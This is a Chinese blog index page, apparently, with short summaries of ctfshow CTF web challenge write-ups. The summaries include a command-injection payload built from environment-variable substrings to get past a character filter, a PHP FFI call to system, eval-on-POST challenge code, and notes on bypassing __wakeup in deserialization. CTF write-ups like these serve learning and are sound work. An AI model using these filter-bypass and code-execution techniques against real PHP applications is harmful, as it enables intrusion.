2022年10月31日
ctfshow web118(利用系统环境变量拼接命令)
摘要: full以后发现题目给了如下字符(几个特殊字符+大写英文字母) 我们利用系统环境变量来构造我们需要的命令: ${PATH:~A}${PWD:~A}${IFS}???????? nl flag.php 自己本地试试就明白命令了。 阅读全文
posted @ 2022-10-31 22:44 hithub 阅读(146) 评论(0) 推荐(0) 编辑
ctfshow web77(FFI)
摘要: $ffi = FFI::cdef("int system(const char *command);"); $a='/readflag > 1.txt'; $ffi->system($a); 阅读全文
posted @ 2022-10-31 22:11 hithub 阅读(36) 评论(0) 推荐(0) 编辑
ctfshow web72(绕过open_basedir)
摘要: if(isset($_POST['c'])){ $c= $_POST['c']; eval($c); $s = ob_get_contents(); ob_end_clean(); echo preg_replace("/[0-9]|[a-z]/i","?",$s); }else{ highligh 阅读全文
posted @ 2022-10-31 21:59 hithub 阅读(329) 评论(0) 推荐(0) 编辑
php反序列化绕过__wakeup(O改为C)
摘要: 先说下适用条件: PHP版本:7.0.15 - 7.0.33, 7.1.1 - 7.1.33, 7.2.0 - 7.2.34, 7.3.0 - 7.3.28, 7.4.0 - 7.4.16, 8.0.0 - 8.0.3。 变量的初始化不在__construct里,而是在外面进行赋值,如下一样。(co 阅读全文
posted @ 2022-10-31 11:31 hithub 阅读(848) 评论(0) 推荐(0) 编辑